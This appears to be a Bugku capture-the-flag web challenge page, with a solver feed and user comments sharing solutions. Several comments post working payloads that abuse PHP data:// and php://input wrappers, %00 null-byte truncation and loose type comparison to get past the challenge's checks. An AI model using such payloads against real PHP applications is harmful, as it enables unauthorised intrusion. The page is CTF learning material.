评分(27)
解题动态
依旧是偏爱 攻破了该题 8小时前
15955100605 攻破了该题 1天前
店晓贰 攻破了该题 2天前
喜羊羊1 攻破了该题 3天前
bugkuaccount3214 攻破了该题 4天前
莫及 攻破了该题 6天前
怎么都吃不饱 攻破了该题 8天前
笨笨笨蛋 攻破了该题 8天前
dacming9527 攻破了该题 10天前
2000005557 攻破了该题 10天前
yehlg 攻破了该题 11天前
ggtom 攻破了该题 11天前
202221410016 攻破了该题 11天前
SE_Stars 攻破了该题 13天前
ava- 攻破了该题 16天前
donk7891666 攻破了该题 16天前
lihaoweiseven 攻破了该题 17天前
汤布里伯 攻破了该题 18天前
bbbuild 攻破了该题 19天前
评论
暗流安全 29天前
举报
/hello.php?id=00&a=data://text/plain,bugku%20is%20a%20nice%20plateform!&b=%0011111
FTJJJ 2月前
举报
POST /hello.php?id=0e123&a=php://input&b=?aaaaaaaa HTTP/1.1 bugku is a nice plateform!
bugfuck2 2月前
举报
查看源代码可以发现注释提示“1p.html”,打开发现会跳转,使用view-source:http://ip/1p.html查看并解码,可以看到源代码,要注意id的值如果是0,在第一步的时候就会跳转会原页面,需要用松散比较绕过,比如id=0a
霓虹 5月前
举报
wp解答的源代码不一样,避雷
对对对对对对对对 7月前
举报
依旧有点意思
soha 7月前
举报
$b的限制eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)用%00字符截断绕过,$a用data://text/plain,文本内容,id=0传参
caicai0728 8月前
举报
解题参考:https://blog.csdn.net/cai_huaer/article/details/153694389?spm=1001.2014.3001.5501
2686213396 11月前
举报
bp抓包,发现第一个相应中有隐藏目录,访问进去,发现加密的JS代码,先后进行url、base64、url解码,得到目标php代码,,根据代码要求,绕过id,a,b的比较,获得flag
iNMB 11月前
举报
?id=00&a=data://text/plain;base64,YnVna3UgaXMgYSBuaWNlIHBsYXRlZm9ybSE=&b=......
zhuizhui 11月前
举报
?id=0a&a=data://text/plain,bugku%20is%20a%20nice%20plateform!&b=%00111bhv14